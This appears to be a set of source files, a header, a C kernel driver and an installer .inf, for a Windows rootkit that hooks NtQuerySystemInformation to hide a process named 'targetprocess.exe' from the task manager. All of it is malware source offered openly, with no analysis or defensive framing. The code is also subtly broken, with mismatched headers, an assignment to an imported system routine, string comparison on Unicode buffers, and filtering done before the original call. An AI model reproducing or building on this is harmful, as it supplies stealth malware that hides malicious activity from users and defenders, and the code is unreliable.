[
    {
        "file_name": "rootkit.h",
        "file_content": "#ifndef ROOTKIT_H\n#define ROOTKIT_H\n\n#include <windows.h>\n#include <ntddk.h>\n\n// Function to hide a process from the task manager\nvoid HideProcess(LPCSTR processName);\n\n// Function to hook the NtQuerySystemInformation system call\nNTSTATUS HookNtQuerySystemInformation(PVOID SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);\n\n#endif // ROOTKIT_H"
    },
    {
        "file_name": "rootkit.c",
        "file_content": "#include \"rootkit.h\"\n\n// Original function pointer for NtQuerySystemInformation\nNTSTATUS (*OriginalNtQuerySystemInformation)(PVOID, PVOID, ULONG, PULONG) = NtQuerySystemInformation;\n\n// Hooked function for NtQuerySystemInformation\nNTSTATUS HookedNtQuerySystemInformation(PVOID SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) {\n    if (SystemInformationClass == SystemProcessInformation) {\n        // Cast the system information to the appropriate structure\n        PSYSTEM_PROCESS_INFORMATION processInfo = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;\n        PSYSTEM_PROCESS_INFORMATION currentProcess = processInfo;\n\n        // Iterate through the process list\n        while (currentProcess) {\n            if (strcmp(currentProcess->ImageName.Buffer, \"targetprocess.exe\") == 0) {\n                // Hide the target process by adjusting the list\n                PSYSTEM_PROCESS_INFORMATION nextProcess = currentProcess->Next;\n                currentProcess->Next = currentProcess->Next->Next;\n                currentProcess = nextProcess;\n            } else {\n                currentProcess = currentProcess->Next;\n            }\n        }\n    }\n\n    // Call the original function\n    return OriginalNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);\n}\n\n// Function to hide a process from the task manager\nvoid HideProcess(LPCSTR processName) {\n    // Hook the NtQuerySystemInformation function\n    UNICODE_STRING hookName;\n    RtlInitUnicodeString(&hookName, L\"NtQuerySystemInformation\");\n    InterlockedExchangePointer((PVOID*)&OriginalNtQuerySystemInformation, MmGetSystemRoutineAddress(&hookName));\n    InterlockedExchangePointer((PVOID*)&NtQuerySystemInformation, HookedNtQuerySystemInformation);\n}\n\n// DriverEntry function for the rootkit driver\nNTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {\n    UNREFERENCED_PARAMETER(RegistryPath);\n\n    // Hide the target process\n    HideProcess(\"targetprocess.exe\");\n\n    // Set the unload routine\n    DriverObject->DriverUnload = DriverUnload;\n\n    return STATUS_SUCCESS;\n}\n\n// DriverUnload function to clean up the rootkit\nvoid DriverUnload(PDRIVER_OBJECT DriverObject) {\n    UNREFERENCED_PARAMETER(DriverObject);\n\n    // Restore the original NtQuerySystemInformation function\n    InterlockedExchangePointer((PVOID*)&NtQuerySystemInformation, OriginalNtQuerySystemInformation);\n}"
    },
    {
        "file_name": "rootkit.inf",
        "file_content": "[Version]\nSignature=\"$WINDOWS NT$\"\nClass=Sample\nClassGuid={4D36E97D-E325-11CE-BFC1-08002BE10318}\nProvider=%ProviderName%\nDriverVer=01/01/2023,1.0.0.0\n\n[Manufacturer]\n%MfgName%=Standard,NTamd64\n\n[Standard.NTamd64]\n%RootkitDesc%=Rootkit_Install, Rootkit\n\n[Rootkit_Install]\nCopyFiles=Rootkit_Files\n\n[Rootkit_Files]\nrootkit.sys\n\n[DestinationDirs]\nRootkit_Files=12\n\n[SourceDisksFiles]\nrootkit.sys=1\n\n[SourceDisksNames]\n1=%DiskName%,,,\n\n[Strings]\nProviderName=\"Rootkit Provider\"\nMfgName=\"Rootkit Manufacturer\"\nRootkitDesc=\"Rootkit Driver\"\nDiskName=\"Rootkit Installation Disk\""
    }
]